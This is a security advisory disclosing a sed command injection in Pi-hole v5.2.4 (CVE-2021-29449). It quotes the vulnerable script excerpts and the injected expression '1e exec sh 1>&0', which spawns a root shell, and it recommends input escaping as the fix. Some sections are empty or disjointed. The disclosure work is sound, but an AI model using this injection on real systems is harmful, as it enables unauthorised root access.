#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: Pi-hole [1]
# Vendor: Pi-hole
# CSNC ID: CSNC-2021-008
# CVE ID: CVE-2021-29449
# Subject: Privilege Escalation
# Risk: High
# Effect: Locally exploitable
# Author: Emanuele Barbeno <emanuele.barbeno@compass-security.com>
# Date: 20.04.2021
#
#############################################################
Introduction
------------
Affected
--------
Vulnerable:
* Pi-hole v5.2.4
Not vulnerable:
* Pi-hole v5.3
No other versions were tested, but older versions are believed to be
vulnerable as well.
Technical Description
---------------------
The 'removecustomcname' sub-command splices the user-supplied domain and
target into a sed expression without any escaping (excerpt of the pihole
script):
```
domain="${args[2]}"
target="${args[3]}"
# ${domain} and ${target} are expanded verbatim inside the sed script, so any
# '/' or ';' they contain ends the address and starts a new sed command
sed -i "/cname=${domain},${target}/d" "${dnscustomcnamefile}"
main() {
args=("$@")
case "${args[1]}" in
[CUT BY COMPASS]
"addcustomdns" ) AddCustomDNSAddress;;
"removecustomdns" ) RemoveCustomDNSAddress;;
"addcustomcname" ) AddCustomCNAMERecord;;
"removecustomcname" ) RemoveCustomCNAMERecord;;
* ) helpFunc;;
esac
```
With a crafted domain argument the sed script therefore contains three
expressions separated by ';':
* /cname= a/d
* 1e exec sh 1>&0
* /,/d
The second expression uses GNU sed's 'e' command to execute 'exec sh', which
spawns a shell with the privileges of the user running the pihole script; under
sudo that is root.
Add a fake entry inside the custom.list file using the pihole script:
```
$ sudo /usr/local/bin/pihole -a addcustomdns '8.8.8.8' 'google.com'
[✓] Adding custom DNS entry...
[✓] Restarting DNS server
```
Check if the fake entry has been added to the file:
```
$ cat /etc/pihole/custom.list
8.8.8.8 google.com
```
The 'removecustomdns' sub-command builds its sed expression the same way from
the user-supplied IP address and hostname:
```
ip="${args[2]}"
host="${args[3]}"
# same pattern: unescaped user input inside the sed address
sed -i "/${ip} ${host}/d" "${dnscustomfile}"
[CUT BY COMPASS]
main() {
args=("$@")
case "${args[1]}" in
[CUT BY COMPASS]
"addcustomdns" ) AddCustomDNSAddress;;
"removecustomdns" ) RemoveCustomDNSAddress;;
"addcustomcname" ) AddCustomCNAMERecord;;
"removecustomcname" ) RemoveCustomCNAMERecord;;
* ) helpFunc;;
esac
```
The 'removestaticdhcp' sub-command is reached through the same dispatcher:
```
[CUT BY COMPASS]
main() {
args=("$@")
case "${args[1]}" in
[CUT BY COMPASS]
"removestaticdhcp" ) RemoveDHCPStaticAddress;;
[CUT BY COMPASS]
esac
```
Workaround / Fix
----------------
Perform strict validation and escaping of all user-provided input that is used
to construct OS commands, so that no kind of injection is possible. [4]
References
----------
[1] https://pi-hole.net/
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj
[4] https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html